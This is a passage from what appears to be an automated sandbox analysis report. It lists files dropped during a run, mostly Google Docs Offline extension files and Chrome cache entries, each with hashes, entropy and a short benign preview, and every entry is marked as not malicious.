                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                Entropy (8bit):4.416666604226286
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:7cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNd5+:gi58oSWIZBk2MM6AFBfo
                                                                                                                                                                                                                                                MD5:45F34D274BC84860495CE4CA6504F260
                                                                                                                                                                                                                                                SHA1:80A73C88EA18D801099FB39839BF04E654756BF8
                                                                                                                                                                                                                                                SHA-256:C8CE9019F895593A2B905BB459609E2627BA9F515B7DAB38F6555F8E5048E024
                                                                                                                                                                                                                                                SHA-512:DC2302B6D37BB309FF3BB584E9D36904608E6784BF160C9FAEACCA9A6A59FC1E2D74BB686B07197299A1BA2613672D203DB7BF428413424492C5CC543E977026
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ.9..O..............................................................................................................................................................................................................................................................................................................................................(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                Chrome Cache Entry: 306

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10127)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):10132
                                                                                                                                                                                                                                                Entropy (8bit):5.7560360552217755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:bBFd66666fvaESUvtzy4S4R3SbCA9TpH6666K4If42dKYsVNp/JK3zLW6:bd66666qHezyI8b1zH6666KhAwKY2NW5
                                                                                                                                                                                                                                                MD5:D2AEFE3FA6D5506F619566E2BD49EBB4
                                                                                                                                                                                                                                                SHA1:CC6441FB36984FDDEC61353997EC7B4F924EE631
                                                                                                                                                                                                                                                SHA-256:7645B361F6A5C2ED86201ADAF7359D7D75849F0C7B4100C19BEDF305D32F477F
                                                                                                                                                                                                                                                SHA-512:1EBF94063CB9E8B8586378148CFAD38989C149C568C8E5D3390B031182EAE11F29AEF5DADFE3AF69C37DCCA4F8435AB9261014969E208D847CC6E41C6C0AA558
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                Preview:)]}'.["",["carry on movies","michigan wolverines football","canada postal workers strike","december full moon cold moon","helldivers 2 illuminate calypso","wwe saturday night main event","lottery powerball jackpot","georgia bulldogs football"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CgkvbS8wZnNiXzYSDUZvb3RiYWxsIHRlYW0yyxdkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJFUUFDRVFFREVRSC94QUFiQUFBQkJRRUJBQUFBQUFBQUFBQUFBQUFBQVFNRUJRWUNCLy9FQURZUUFBRURBd01DQXdRSENRQUFBQUFBQUFFQ0F3UUFCUkVHRWlFeFFSTWlVUlFWY1lFV01sSmhsS1BUQnpaVmRJS1JrcUd6LzhRQUdnRUFBd0VCQVFFQUFBQUFBQ

                                                                                                                                                                                                                                                Chrome Cache Entry: 307

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                Chrome Cache Entry: 308

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):132978
                                                                                                                                                                                                                                                Entropy (8bit):5.435062797614452
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:fPktv3zg+newH5FsYZGFsxIo4EALe13y2i6o:fivn/H/MFsxIoQY3y8o
                                                                                                                                                                                                                                                MD5:5F24D564BB9CC0812379D880572A4287
                                                                                                                                                                                                                                                SHA1:4883609672D919F2B70437AC8A68D69F24471D53
                                                                                                                                                                                                                                                SHA-256:0B974AC6BF8F2DE48CA4ACCCB5A53237547E155041AE385F575C9644BAE00926
                                                                                                                                                                                                                                                SHA-512:05397637B91258532116A8C69D03D5B2CD9170352D1AE96B12DAF2B91D517788C5F78B68B0419EB7EAEB65F4D9858C2BCF90E691988DE6765D76ACC2A9037F9A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
